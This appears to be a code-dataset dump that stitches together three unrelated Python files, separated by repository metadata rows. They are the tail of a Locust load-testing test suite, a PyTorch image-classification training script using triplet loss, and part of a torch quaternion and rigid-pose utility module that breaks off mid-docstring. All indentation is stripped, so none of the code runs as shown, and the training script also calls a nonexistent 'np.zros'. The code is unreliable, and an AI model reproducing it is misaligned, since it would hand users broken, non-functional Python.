self.assertEqual(1, len(master.clients))
master.quit()
class TestWorkerRunner(LocustTestCase):
def setUp(self):
super().setUp()
# self._report_to_master_event_handlers = [h for h in events.report_to_master._handlers]
def tearDown(self):
# events.report_to_master._handlers = self._report_to_master_event_handlers
super().tearDown()
def get_runner(self, environment=None, user_classes=[]):
if environment is None:
environment = self.environment
environment.user_classes = user_classes
return WorkerRunner(environment, master_host="localhost", master_port=5557)
def test_worker_stop_timeout(self):
class MyTestUser(User):
_test_state = 0
@task
def the_task(self):
MyTestUser._test_state = 1
gevent.sleep(0.2)
MyTestUser._test_state = 2
with mock.patch("locust.rpc.rpc.Client", mocked_rpc()) as client:
environment = Environment()
test_start_run = [False]
@environment.events.test_start.add_listener
def on_test_start(_environment, **kw):
test_start_run[0] = True
worker = self.get_runner(environment=environment, user_classes=[MyTestUser])
self.assertEqual(1, len(client.outbox))
self.assertEqual("client_ready", client.outbox[0].type)
client.mocked_send(
Message(
"spawn",
{
"spawn_rate": 1,
"num_users": 1,
"host": "",
"stop_timeout": 1,
},
"dummy_client_id",
)
)
# print("outbox:", client.outbox)
# wait for worker to spawn locusts
self.assertIn("spawning", [m.type for m in client.outbox])
worker.spawning_greenlet.join()
self.assertEqual(1, len(worker.user_greenlets))
# check that locust has started running
gevent.sleep(0.01)
self.assertEqual(1, MyTestUser._test_state)
# send stop message
client.mocked_send(Message("stop", None, "dummy_client_id"))
worker.user_greenlets.join()
# check that locust user got to finish
self.assertEqual(2, MyTestUser._test_state)
# make sure the test_start was never fired on the worker
self.assertFalse(test_start_run[0])
def test_worker_without_stop_timeout(self):
class MyTestUser(User):
_test_state = 0
@task
def the_task(self):
MyTestUser._test_state = 1
gevent.sleep(0.2)
MyTestUser._test_state = 2
with mock.patch("locust.rpc.rpc.Client", mocked_rpc()) as client:
environment = Environment(stop_timeout=None)
worker = self.get_runner(environment=environment, user_classes=[MyTestUser])
self.assertEqual(1, len(client.outbox))
self.assertEqual("client_ready", client.outbox[0].type)
client.mocked_send(
Message(
"spawn",
{
"spawn_rate": 1,
"num_users": 1,
"host": "",
"stop_timeout": None,
},
"dummy_client_id",
)
)
# print("outbox:", client.outbox)
# wait for worker to spawn locusts
self.assertIn("spawning", [m.type for m in client.outbox])
worker.spawning_greenlet.join()
self.assertEqual(1, len(worker.user_greenlets))
# check that locust has started running
gevent.sleep(0.01)
self.assertEqual(1, MyTestUser._test_state)
# send stop message
client.mocked_send(Message("stop", None, "dummy_client_id"))
worker.user_greenlets.join()
# check that locust user did not get to finish
self.assertEqual(1, MyTestUser._test_state)
def test_change_user_count_during_spawning(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
with mock.patch("locust.rpc.rpc.Client", mocked_rpc()) as client:
environment = Environment()
worker = self.get_runner(environment=environment, user_classes=[MyUser])
client.mocked_send(
Message(
"spawn",
{
"spawn_rate": 5,
"num_users": 10,
"host": "",
"stop_timeout": None,
},
"dummy_client_id",
)
)
sleep(0.6)
self.assertEqual(STATE_SPAWNING, worker.state)
client.mocked_send(
Message(
"spawn",
{
"spawn_rate": 5,
"num_users": 9,
"host": "",
"stop_timeout": None,
},
"dummy_client_id",
)
)
sleep(0)
worker.spawning_greenlet.join()
self.assertEqual(9, len(worker.user_greenlets))
worker.quit()
class TestMessageSerializing(unittest.TestCase):
def test_message_serialize(self):
msg = Message("client_ready", None, "my_id")
rebuilt = Message.unserialize(msg.serialize())
self.assertEqual(msg.type, rebuilt.type)
self.assertEqual(msg.data, rebuilt.data)
self.assertEqual(msg.node_id, rebuilt.node_id)
class TestStopTimeout(LocustTestCase):
def test_stop_timeout(self):
short_time = 0.05
class MyTaskSet(TaskSet):
@task
def my_task(self):
MyTaskSet.state = "first"
gevent.sleep(short_time)
MyTaskSet.state = "second" # should only run when run time + stop_timeout is > short_time
gevent.sleep(short_time)
MyTaskSet.state = "third" # should only run when run time + stop_timeout is > short_time * 2
class MyTestUser(User):
tasks = [MyTaskSet]
environment = Environment(user_classes=[MyTestUser])
runner = environment.create_local_runner()
runner.start(1, 1, wait=False)
gevent.sleep(short_time / 2)
runner.quit()
self.assertEqual("first", MyTaskSet.state)
# exit with timeout
environment = Environment(user_classes=[MyTestUser], stop_timeout=short_time / 2)
runner = environment.create_local_runner()
runner.start(1, 1, wait=False)
gevent.sleep(short_time)
runner.quit()
self.assertEqual("second", MyTaskSet.state)
# allow task iteration to complete, with some margin
environment = Environment(user_classes=[MyTestUser], stop_timeout=short_time * 3)
runner = environment.create_local_runner()
runner.start(1, 1, wait=False)
gevent.sleep(short_time)
timeout = gevent.Timeout(short_time * 2)
timeout.start()
try:
runner.quit()
runner.greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception. Some locusts must have kept running after iteration finish")
finally:
timeout.cancel()
self.assertEqual("third", MyTaskSet.state)
def test_stop_timeout_during_on_start(self):
short_time = 0.05
class MyTaskSet(TaskSet):
finished_on_start = False
my_task_run = False
def on_start(self):
gevent.sleep(short_time)
MyTaskSet.finished_on_start = True
@task
def my_task(self):
MyTaskSet.my_task_run = True
class MyTestUser(User):
tasks = [MyTaskSet]
environment = create_environment([MyTestUser], mocked_options())
environment.stop_timeout = short_time
runner = environment.create_local_runner()
runner.start(1, 1)
gevent.sleep(short_time / 2)
runner.quit()
self.assertTrue(MyTaskSet.finished_on_start)
self.assertFalse(MyTaskSet.my_task_run)
def test_stop_timeout_exit_during_wait(self):
short_time = 0.05
class MyTaskSet(TaskSet):
@task
def my_task(self):
pass
class MyTestUser(User):
tasks = [MyTaskSet]
wait_time = constant(1)
environment = Environment(user_classes=[MyTestUser], stop_timeout=short_time)
runner = environment.create_local_runner()
runner.start(1, 1)
gevent.sleep(short_time) # sleep to make sure locust has had time to start waiting
timeout = gevent.Timeout(short_time)
timeout.start()
try:
runner.quit()
runner.greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception. Waiting locusts should stop immediately, even when using stop_timeout.")
finally:
timeout.cancel()
def test_stop_timeout_with_interrupt(self):
short_time = 0.05
class MySubTaskSet(TaskSet):
@task
def a_task(self):
gevent.sleep(0)
self.interrupt(reschedule=True)
class MyTaskSet(TaskSet):
tasks = [MySubTaskSet]
class MyTestUser(User):
tasks = [MyTaskSet]
environment = create_environment([MyTestUser], mocked_options())
environment.stop_timeout = short_time
runner = environment.create_local_runner()
runner.start(1, 1, wait=True)
gevent.sleep(0)
timeout = gevent.Timeout(short_time)
timeout.start()
try:
runner.quit()
runner.greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception. Interrupted locusts should exit immediately during stop_timeout.")
finally:
timeout.cancel()
def test_stop_timeout_with_interrupt_no_reschedule(self):
state = [0]
class MySubTaskSet(TaskSet):
@task
def a_task(self):
gevent.sleep(0.1)
state[0] = 1
self.interrupt(reschedule=False)
class MyTestUser(User):
tasks = [MySubTaskSet]
wait_time = constant(3)
environment = create_environment([MyTestUser], mocked_options())
environment.stop_timeout = 0.3
runner = environment.create_local_runner()
runner.start(1, 1, wait=True)
gevent.sleep(0)
timeout = gevent.Timeout(0.11)
timeout.start()
try:
runner.quit()
runner.greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception. Interrupted locusts should exit immediately during stop_timeout.")
finally:
timeout.cancel()
self.assertEqual(1, state[0])
def test_kill_locusts_with_stop_timeout(self):
short_time = 0.05
class MyTaskSet(TaskSet):
@task
def my_task(self):
MyTaskSet.state = "first"
gevent.sleep(short_time)
MyTaskSet.state = "second" # should only run when run time + stop_timeout is > short_time
gevent.sleep(short_time)
MyTaskSet.state = "third" # should only run when run time + stop_timeout is > short_time * 2
class MyTestUser(User):
tasks = [MyTaskSet]
environment = create_environment([MyTestUser], mocked_options())
runner = environment.create_local_runner()
runner.start(1, 1)
gevent.sleep(short_time / 2)
runner.stop_users(1)
self.assertEqual("first", MyTaskSet.state)
runner.quit()
environment.runner = None
environment.stop_timeout = short_time / 2 # exit with timeout
runner = environment.create_local_runner()
runner.start(1, 1)
gevent.sleep(short_time)
runner.stop_users(1)
self.assertEqual("second", MyTaskSet.state)
runner.quit()
environment.runner = None
environment.stop_timeout = short_time * 3 # allow task iteration to complete, with some margin
runner = environment.create_local_runner()
runner.start(1, 1)
gevent.sleep(short_time)
timeout = gevent.Timeout(short_time * 2)
timeout.start()
try:
runner.stop_users(1)
runner.user_greenlets.join()
except gevent.Timeout:
self.fail("Got Timeout exception. Some locusts must have kept running after iteration finish")
finally:
timeout.cancel()
self.assertEqual("third", MyTaskSet.state)
def test_users_can_call_runner_quit_with_stop_timeout(self):
class BaseUser(User):
wait_time = constant(1)
@task
def trigger(self):
self.environment.runner.quit()
runner = Environment(user_classes=[BaseUser]).create_local_runner()
runner.environment.stop_timeout = 1
runner.spawn_users(1, 1, wait=False)
timeout = gevent.Timeout(0.5)
timeout.start()
try:
runner.greenlet.join()
except gevent.Timeout:
self.fail("Got Timeout exception, runner must have hung somehow.")
finally:
timeout.cancel()
def test_gracefully_handle_exceptions_in_listener(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
test_stop_run = [0]
environment = Environment(user_classes=[User])
def on_test_stop_ok(*args, **kwargs):
test_stop_run[0] += 1
def on_test_stop_fail(*args, **kwargs):
assert 0
environment.events.test_stop.add_listener(on_test_stop_ok)
environment.events.test_stop.add_listener(on_test_stop_fail)
environment.events.test_stop.add_listener(on_test_stop_ok)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
self.assertEqual(0, test_stop_run[0])
runner.stop()
self.assertEqual(2, test_stop_run[0])
def test_stop_timeout_with_ramp_down(self):
class MyTaskSet(TaskSet):
@task
def my_task(self):
gevent.sleep(1)
class MyTestUser(User):
tasks = [MyTaskSet]
environment = Environment(user_classes=[MyTestUser], stop_timeout=2)
runner = environment.create_local_runner()
# Start load test, wait for users to start, then trigger ramp down
runner.start(10, 10, wait=False)
sleep(1)
runner.start(2, 4, wait=False)
# Wait a moment and then ensure the user count has started to drop but
# not immediately to user_count
sleep(1.1)
user_count = len(runner.user_greenlets)
self.assertTrue(user_count > 5, "User count has decreased too quickly: %i" % user_count)
self.assertTrue(user_count < 10, "User count has not decreased at all: %i" % user_count)
# Wait and ensure load test users eventually dropped to desired count
sleep(2)
user_count = len(runner.user_greenlets)
self.assertTrue(user_count == 2, "User count has not decreased correctly to 2, it is : %i" % user_count)
| [
"huiren16@gmail.com"
] | huiren16@gmail.com |
dbcece8b142ebd4d2acf78f79ac9e5a07c15cad7 | 4aadd3b54d847559948ad736420ee4313dd2d2a9 | /main.py | beac7dbd881da4296ca003c00e95fc06a50e0def | [] | no_license | Xingxu1996/ADML | 339186616ce247083f500bdd7dba9550eb057ca7 | f0aefd91c4e26a3f59b665917bc2a43b06161582 | refs/heads/main | 2023-04-30T13:14:47.805896 | 2021-05-15T06:14:15 | 2021-05-15T06:14:15 | 367,554,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,753 | py | import scipy.io as io
import torch
import torchvision
import os
from sklearn.metrics import confusion_matrix
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
from torch.optim import lr_scheduler
import torch.optim as optim
from torch.autograd import Variable
from mtrainer import *
import numpy as np
from datahd import *
cuda = torch.cuda.is_available()
from datasets import BalancedBatchSampler
import matplotlib
import matplotlib.pyplot as plt
#from torchvision.datasets import MNIST
from torchvision import transforms
from networks import *
mean, std = 0.1307, 0.3081
import torch.nn as nn
#from resnet import *
# from inception_v3 import *
from resnet import *
from googlenet import *
#from old_losses import TripletLoss, Accuracy, OnlineTripletLoss
from w_losses import *
#from oldutils import *
from w_utils import *
from w_mtrainer import *
from datasets import BalancedBatchSampler
from metrics import AccumulatedAccuracyMetric, AverageNonzeroTripletsMetric
from googlenet import *
# cmats=[]
# accuracy=[]
def extract_embeddings(dataloader, model,name):
with torch.no_grad():
model.eval()
embeddings = np.zeros((len(dataloader.dataset), 544))
labels = np.zeros(len(dataloader.dataset))
k = 0
for images, target in dataloader:
if cuda:
images = images.cuda()
embeddings[k:k+len(images)] = model.forward(images)[0].data.cpu().numpy()
labels[k:k+len(images)] = target.numpy()
k += len(images)
# f = open("newours_0.1_0.9_train.txt", 'a')
# np.savetxt("newours_0.1_0.9_train.txt", embeddings)
io.savemat(name,{'data':embeddings})
return embeddings, labels
def extract_embeddingstest(dataloader,model):
with torch.no_grad():
model.eval()
embeddings = np.zros((len(dataloader.dataset), 2048))
labels = np.zeros(len(dataloader.dataset))
k = 0
for images, target in dataloader:
if cuda:
images = images.cuda()
embeddings[k:k+len(images)] = model.forward(images)[0].data.cpu().numpy()
labels[k:k+len(images)] = target.numpy()
k+=len(images)
f = open("newours_0.1_0.9_test.txt", 'a')
np.savetxt("newours_0.1_0.9_test.txt", embeddings)
return embeddings, labels
embedding_net = Inception3()
# embedding_net = ResNet()
# embedding_net = inception_v3()
# embedding_net.load_state_dict(torch.load('res_e6.pkl'))
#
model = embedding_net
# torch.save(model.state_dict(), 'res_7.pkl')
# for i in range(1, 6):
# imodel=model
# torch.save(imodel.state_dict(), 'res_7.pkl')
# print(model)
# model.load_state_dict(torch.load('res_7.pkl'))
train_dataset = MyDataset(root='/home/ubuntu5/yxx/Benchmark_split/Fi/', datatxt='fi_trainimg_label.txt', train=True, transform=transforms.Compose([
transforms.Scale(356),
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(299),
transforms.ToTensor(),
#transforms.Normalize((mean,), (std,))
]), target_transform=transforms.Compose([transforms.ToTensor()]))
test_dataset = MyDataset(root='/home/ubuntu5/yxx/Benchmark_split/Fi/', datatxt='fi_testimg_label.txt', transform=transforms.Compose([
# transforms.Resize((28, 28)),
transforms.Scale(356),
transforms.CenterCrop(299),
transforms.ToTensor(),
#transforms.Normalize((mean,), (std,))
]), target_transform=transforms.Compose([transforms.ToTensor()]))
train_batch_sampler = BalancedBatchSampler(train_dataset, n_classes=8, n_samples=6)
test_batch_sampler = BalancedBatchSampler(test_dataset, n_classes=8, n_samples=6)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=32, shuffle=False, num_workers=8)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=32, shuffle=False)
kwargs = {'num_workers': 6, 'pin_memory': True} if cuda else {}
online_train_loader = torch.utils.data.DataLoader(train_dataset, batch_sampler=train_batch_sampler, **kwargs)
online_test_loader = torch.utils.data.DataLoader(test_dataset, batch_sampler=test_batch_sampler, **kwargs)
# from networks import EmbeddingNet, TripletNet, ResNet
if cuda:
model.cuda()
margin1 = 0.2
margin2 = 0.1
loss_fn1 = OnlineTripletLoss(margin1, margin2, SemihardNegativeTripletSelector(margin1, margin2))
loss_fn2 = nn.CrossEntropyLoss()
lr = 1e-2
optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=5e-4, nesterov=True)
scheduler = lr_scheduler.StepLR(optimizer, 40, gamma=0.1, last_epoch=-1)
n_epochs = 100
log_interval = 100
# predict_label1 = filt(test_loader=test_loader, model=model, scheduler=scheduler, num_epochs=1, cuda=cuda)
fit(online_train_loader, online_test_loader, embedding_net, model, loss_fn1, loss_fn2, optimizer, scheduler, n_epochs, cuda, log_interval, metrics=[AccumulatedAccuracyMetric()])
# a,b=extract_embeddings(train_loader,imodel,'./data_fea/res_iap_train_'+str(i)+'.mat')
# c,d=extract_embeddings(test_loader,imodel,'./data_fea/res_iap_test'+str(i)+'.mat')
# del model, embedding_net, loss_fn1, loss_fn2, online_train_loader, online_test_loader
# labels = test_dataset.__labels__()
# labels_list=labels.tolist()
# io.savemat('./pre_label_res/abs_label_'+str(i)+'.mat', {'data':labels_list})
# acc=fitest(test_loader, model, embedding_net, loss_fn2, scheduler, 1, cuda, metrics=[AccumulatedAccuracyMetric()])
# predict_label1 = filt(test_loader=test_loader, model=model, scheduler=scheduler, num_epochs=1, cuda=cuda)
# io.savemat('./pre_label_res/abs_pl_'+str(i)+'.mat', {'data': predict_label1}) #########
# # predict_label1=np.transpose(np.array(predict_label1))
# labels = np.array(labels)
# labels = labels.astype(int)
#
# cmat = confusion_matrix(labels, predict_label1)
# cmats.append(cmat)
# accuracy.append(acc)
# np.save('.pre_label_res/abs_cmats.npy', np.array(cmats))
# np.save('pre_label_res/abs_accs.npy', accuracy)
# for j in range(5):
# cmat=cmats[j]
# for i in range(len(cmat)):
# print(cmat[i] / np.sum(cmat[i]))
# for i in range(len(cmat)):
# print((cmat[i] / np.sum(cmat[i]))[i])
# print(accuracy)
#fitest(test_loader, embedding_net, model, loss_fn2, scheduler, n_epochs, cuda, metrics=[AccumulatedAccuracyMetric()])
# train_embeddings_tl,train_labels_tl = extract_embeddings(train_loader,embedding_net)
# val_embeddings_tl,val_labels_tl = extract_embeddingstest(test_loader,embedding_net) | [
"noreply@github.com"
] | Xingxu1996.noreply@github.com |
bd162ea5c30a6a6a8905b5c33e0068e0a0a682ec | 20cdaa9c53e80fe93718fe989d3c14192cf86e04 | /dgp/utils/torch_extension/pose.py | 184bfe1a8b6894df27cedc9a1a0f51e2d11b651c | [
"MIT"
] | permissive | parallel-domain/dgp | d84de3a9ed14cf1cdbe8903251e20ca1a696f4a1 | ee21c27b3423a23527a28b8433c96ea800315337 | refs/heads/master | 2023-06-27T23:02:46.296109 | 2021-08-03T01:30:41 | 2021-08-03T01:30:41 | 268,911,939 | 0 | 0 | MIT | 2021-08-03T01:30:42 | 2020-06-02T21:24:44 | Python | UTF-8 | Python | false | false | 19,649 | py | # Copyright 2019 Toyota Research Institute. All rights reserved.
"""Torch utilities for rigid-body pose manipulation.
Some of the rotation/quaternion utilities have been borrowed from:
https://github.com/facebookresearch/QuaterNet/blob/master/common/quaternion.py
https://github.com/arraiyopensource/kornia/blob/master/kornia/geometry/conversions.py
"""
import torch
import torch.nn.functional as F
def qmul(q, r):
"""
Multiply quaternion(s) q with quaternion(s) r.
Expects two equally-sized tensors of shape (*, 4), where * denotes any number of dimensions.
Returns q*r as a tensor of shape (*, 4).
Parameters
----------
q: torch.FloatTensor (B4)
Input quaternion to use for rotation.
r: torch.FloatTensor (B4)
Second quaternion to use for rotation composition.
Returns
----------
rotated_q: torch.FloatTensor (B4)
Composed quaternion rotation.
"""
assert q.shape[-1] == 4
assert r.shape[-1] == 4
original_shape = q.shape
# Compute outer product
terms = torch.bmm(r.view(-1, 4, 1), q.view(-1, 1, 4))
w = terms[:, 0, 0] - terms[:, 1, 1] - terms[:, 2, 2] - terms[:, 3, 3]
x = terms[:, 0, 1] + terms[:, 1, 0] - terms[:, 2, 3] + terms[:, 3, 2]
y = terms[:, 0, 2] + terms[:, 1, 3] + terms[:, 2, 0] - terms[:, 3, 1]
z = terms[:, 0, 3] - terms[:, 1, 2] + terms[:, 2, 1] + terms[:, 3, 0]
return torch.stack((w, x, y, z), dim=1).view(original_shape)
def qrot(q, v):
"""
Rotate vector(s) v about the rotation described by quaternion(s) q.
Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,
where * denotes any number of dimensions.
Returns a tensor of shape (*, 3).
Parameters
----------
q: torch.FloatTensor (B4)
Input quaternion to use for rotation.
v: torch.FloatTensor (B3)
Input vector to rotate with.
Returns
----------
vector: torch.FloatTensor (B3)
Rotated vector.
"""
assert q.shape[-1] == 4
assert v.shape[-1] == 3
assert q.shape[:-1] == v.shape[:-1]
original_shape = list(v.shape)
q = q.view(-1, 4)
v = v.view(-1, 3)
qvec = q[:, 1:]
uv = torch.cross(qvec, v, dim=1)
uuv = torch.cross(qvec, uv, dim=1)
return (v + 2 * (q[:, :1] * uv + uuv)).view(original_shape)
def qinv(q):
"""Returns the quaternion conjugate. (w, x, y, z)
Parameters
----------
quaternion: torch.FloatTensor (B4)
Input quaternion to invert.
Returns
----------
quaternion: torch.FloatTensor (B4)
Inverted quaternion.
"""
q[..., -3:] *= -1
return q
def quaternion_to_rotation_matrix(quaternion):
"""Converts a quaternion to a rotation matrix.
The quaternion should be in (w, x, y, z) format.
Parameters
----------
quaternion: torch.FloatTensor (B4)
Input quaternion to convert.
Returns
----------
rotation_matrix: torch.FloatTensor (B33)
Batched rotation matrix.
"""
if not isinstance(quaternion, torch.Tensor):
raise TypeError("Input type is not a torch.Tensor. Got {}".format(
type(quaternion)))
if not quaternion.shape[-1] == 4:
raise ValueError(
"Input must be a tensor of shape (*, 4). Got {}".format(
quaternion.shape))
# normalize the input quaternion
quaternion_norm = normalize_quaternion(quaternion)
# unpack the normalized quaternion components
w, x, y, z = torch.chunk(quaternion_norm, chunks=4, dim=-1)
# compute the actual conversion
tx = 2.0 * x
ty = 2.0 * y
tz = 2.0 * z
twx = tx * w
twy = ty * w
twz = tz * w
txx = tx * x
txy = ty * x
txz = tz * x
tyy = ty * y
tyz = tz * y
tzz = tz * z
one = torch.tensor(1.)
matrix = torch.stack([
one - (tyy + tzz), txy - twz, txz + twy,
txy + twz, one - (txx + tzz), tyz - twx,
txz - twy, tyz + twx, one - (txx + tyy)
], dim=-1).view(-1, 3, 3)
if len(quaternion.shape) == 1:
matrix = torch.squeeze(matrix, dim=0)
return matrix
def rotation_matrix_to_quaternion(rotation_matrix, eps=1e-8):
"""Convert 3x3 rotation matrix to 4d quaternion vector.
The quaternion vector has components in (w, x, y, z) format.
Parameters
----------
rotation_matrix: torch.FloatTensor (B33)
Input rotation matrix to convert.
eps: float, default: 1e-8
Epsilon value to avoid zero division.
Returns
----------
quaternion: torch.FloatTensor (B4)
Batched rotation in quaternion.
"""
if not isinstance(rotation_matrix, torch.Tensor):
raise TypeError("Input type is not a torch.Tensor. Got {}".format(
type(rotation_matrix)))
if not rotation_matrix.shape[-2:] == (3, 3):
raise ValueError(
"Input size must be a (*, 3, 3) tensor. Got {}".format(
rotation_matrix.shape))
def safe_zero_division(numerator: torch.Tensor,
denominator: torch.Tensor) -> torch.Tensor:
eps = torch.finfo(numerator.dtype).tiny # type: ignore
return numerator / torch.clamp(denominator, min=eps)
rotation_matrix_vec = rotation_matrix.view(
*rotation_matrix.shape[:-2], 9)
m00, m01, m02, m10, m11, m12, m20, m21, m22 = torch.chunk(
rotation_matrix_vec, chunks=9, dim=-1)
trace = m00 + m11 + m22
def trace_positive_cond():
sq = torch.sqrt(trace + 1.0) * 2. # sq = 4 * qw.
qw = 0.25 * sq
qx = safe_zero_division(m21 - m12, sq)
qy = safe_zero_division(m02 - m20, sq)
qz = safe_zero_division(m10 - m01, sq)
return torch.cat([qw, qx, qy, qz], dim=-1)
def cond_1():
sq = torch.sqrt(1.0 + m00 - m11 - m22 + eps) * 2. # sq = 4 * qx.
qw = safe_zero_division(m21 - m12, sq)
qx = 0.25 * sq
qy = safe_zero_division(m01 + m10, sq)
qz = safe_zero_division(m02 + m20, sq)
return torch.cat([qw, qx, qy, qz], dim=-1)
def cond_2():
sq = torch.sqrt(1.0 + m11 - m00 - m22 + eps) * 2. # sq = 4 * qy.
qw = safe_zero_division(m02 - m20, sq)
qx = safe_zero_division(m01 + m10, sq)
qy = 0.25 * sq
qz = safe_zero_division(m12 + m21, sq)
return torch.cat([qw, qx, qy, qz], dim=-1)
def cond_3():
sq = torch.sqrt(1.0 + m22 - m00 - m11 + eps) * 2. # sq = 4 * qz.
qw = safe_zero_division(m10 - m01, sq)
qx = safe_zero_division(m02 + m20, sq)
qy = safe_zero_division(m12 + m21, sq)
qz = 0.25 * sq
return torch.cat([qw, qx, qy, qz], dim=-1)
where_2 = torch.where(m11 > m22, cond_2(), cond_3())
where_1 = torch.where(
(m00 > m11) & (m00 > m22), cond_1(), where_2)
quaternion = torch.where(
trace > 0., trace_positive_cond(), where_1)
return quaternion
def normalize_quaternion(quaternion, eps=1e-12):
"""Normalizes a quaternion.
The quaternion should be in (w, x, y, z) format.
Parameters
----------
quaternion: torch.FloatTensor (B4)
Input quaternion to normalize.
eps: float, default: 1e-12
Epsilon value to avoid zero division.
Returns
----------
normalized_quaternion: torch.FloatTensor (B4)
Normalized quaternion.
"""
if not isinstance(quaternion, torch.Tensor):
raise TypeError("Input type is not a torch.Tensor. Got {}".format(
type(quaternion)))
if not quaternion.shape[-1] == 4:
raise ValueError(
"Input must be a tensor of shape (*, 4). Got {}".format(
quaternion.shape))
return F.normalize(quaternion, p=2, dim=-1, eps=eps)
def invert_pose(T01):
"""Invert homogeneous matrix as a rigid transformation
T^-1 = [R^T | -R^T * t]
Parameters
----------
T01: torch.FloatTensor (B44)
Input batch of transformation tensors.
Returns
----------
T10: torch.FloatTensor (B44)
Inverted batch of transformation tensors.
"""
Tinv = torch.eye(4, device=T01.device, dtype=T01.dtype).repeat([len(T01), 1, 1])
Tinv[:, :3, :3] = torch.transpose(T01[:, :3, :3], -2, -1)
Tinv[:, :3, -1] = torch.bmm(-1. * Tinv[:, :3, :3], T01[:, :3, -1].unsqueeze(-1)).squeeze(-1)
return Tinv
class Pose:
"""Generic rigid-body transformation class that operates on the
appropriately defined manifold.
Parameters
----------
value: torch.FloatTensor (44, B44)
Input transformation tensors either batched (B44) or as a single value (44).
Attributes
----------
value: torch.FloatTensor (B44)
Input transformation tensor batched (B44)
"""
def __init__(self, value):
assert tuple(value.shape[-2:]) == (4, 4)
# If (4,4) tensor is passed, convert to (1,4,4)
if value.dim() == 2:
value = value.unsqueeze(0)
assert value.dim() == 3
self.value = value
def __repr__(self):
return self.value.__repr__()
def __len__(self):
"""Batch size of pose tensor"""
return len(self.value)
def copy(self):
raise NotImplementedError()
@classmethod
def identity(cls, B=1, device=None, dtype=torch.float):
"""Batch of identity matrices.
Parameters
----------
N: int
Batch size.
Returns
----------
Pose
Batch of identity transformation poses.
"""
return cls(torch.eye(4, device=device, dtype=dtype).repeat([B,1,1]))
@property
def matrix(self):
"""Returns the batched homogeneous matrix as a tensor
Returns
----------
result: torch.FloatTensor (B44)
Bx4x4 homogeneous matrix
"""
return self.value
@property
def rotation_matrix(self):
"""Returns the 3x3 rotation matrix (R)
Returns
----------
result: torch.FloatTensor (B33)
Bx3x3 rotation matrix
"""
return self.value[..., :3, :3]
@property
def translation(self):
"""Return the translation component of the pose as a torch.Tensor.
Returns
----------
tvec: torch.FloatTensor (B3)
Translation component of the Pose object.
"""
return self.value[..., :3, -1]
def repeat(self, *args, **kwargs):
"""Repeat the Pose tensor"""
self.value = self.value.repeat(*args, **kwargs)
return self
def to(self, *args, **kwargs):
"""Move object to specified device"""
self.value = self.value.to(*args, **kwargs)
return self
def __mul__(self, other):
"""Matrix multiplication overloading for pose-pose and pose-point
transformations.
Parameters
----------
other: Pose or torch.FloatTensor
Either Pose, or 3-D points torch.FloatTensor (B3N or B3HW).
Returns
----------
Pose
Transformed pose, or 3-D points via rigid-transform on the manifold,
with same type as other.
"""
if isinstance(other, Pose):
return self.transform_pose(other)
elif isinstance(other, torch.Tensor):
if other.shape[1] == 3 and other.dim() > 2:
assert other.dim() == 3 or other.dim() == 4
return self.transform_points(other)
else:
raise ValueError('Unknown tensor dimensions {}'.format(other.shape))
elif isinstance(other, BoundingBox3D):
raise NotImplementedError()
else:
raise NotImplementedError()
def __rmul__(self, other):
raise NotImplementedError('Right multiply not implemented yet!')
def transform_pose(self, other):
"""Left-multiply (oplus) rigid-body transformation.
Parameters
----------
other: Pose
Pose to left-multiply with (self * other)
Returns
----------
Pose
Transformed Pose via rigid-transform on the manifold.
"""
assert tuple(other.value.shape[-2:]) == (4, 4)
return Pose(self.value.bmm(other.value))
def transform_points(self, X0):
"""Transform 3-D points from one frame to another via rigid-body transformation.
Parameters
----------
X0: torch.FloatTensor (B3N or B3HW)
3-D points in torch.FloatTensor (shaped either B3N or B3HW).
Returns
----------
torch.FloatTensor (B3N or B3HW)
Transformed 3-D points with the same shape as X0.
"""
assert X0.shape[1] == 3
B = len(X0)
shape = X0.shape[2:]
X1 = self.value[:,:3,:3].bmm(X0.view(B, 3, -1)) + self.value[:,:3,-1].unsqueeze(-1)
return X1.view(B, 3, *shape)
def inverse(self):
"""Invert homogeneous matrix as a rigid transformation.
Returns
----------
Pose
Pose batch inverted on the appropriate manifold.
"""
return Pose(invert_pose(self.value))
class QuaternionPose:
"""Derived Pose class that operates on the quaternion manifold instead.
Parameters
----------
wxyz: torch.FloatTensor (4, B4)
Input quaternion tensors either batched (B4) or as a single value (4,).
tvec: torch.FloatTensor (3, B3)
Input translation tensors either batched (B3) or as a single value (3,).
"""
def __init__(self, wxyz, tvec):
assert wxyz.dim() == tvec.dim(), (
'Quaternion and translation dimensions are different')
assert len(wxyz) == len(tvec), (
'Quaternion and translation batch sizes are different')
# If (d) tensor is passed, convert to (B,d)
if wxyz.dim() == 1:
wxyz = wxyz.unsqueeze(0)
tvec = tvec.unsqueeze(0)
assert wxyz.dim() == 2
self.quat = wxyz
self.tvec = tvec
def __len__(self):
"""Batch size of pose tensor"""
return len(self.quat)
def __repr__(self):
return 'QuaternionPose: B={}, [qw, qx, qy, qz, x, y, z]'.format(
len(self), torch.cat([self.quat, self.tvec], dim=-1))
@classmethod
def identity(cls, B=1, device=None, dtype=torch.float):
"""Batch of identity matrices.
Parameters
----------
N: int
Batch size.
Returns
----------
Pose
Batch of identity transformation poses.
"""
return cls(torch.tensor([1., 0., 0., 0., 0., 0., 0.], device=device, dtype=dtype).repeat([B, 1]))
@classmethod
def from_matrix(cls, value):
"""Create a batched QuaternionPose from a batched homogeneous matrix.
Parameters
----------
value: torch.FloatTensor (B44)
Batched homogeneous matrix.
Returns
----------
pose: QuaternionPose with batch B
QuaternionPose batch.
"""
if value.dim() == 2:
value = value.unsqueeze(0)
wxyz = rotation_matrix_to_quaternion(value[..., :3, :3].contiguous())
tvec = value[..., :3, -1]
return cls(wxyz, tvec)
@property
def matrix(self):
"""Returns the batched homogeneous matrix as a tensor
Returns
----------
result: torch.FloatTensor (B44)
Bx4x4 homogeneous matrix
"""
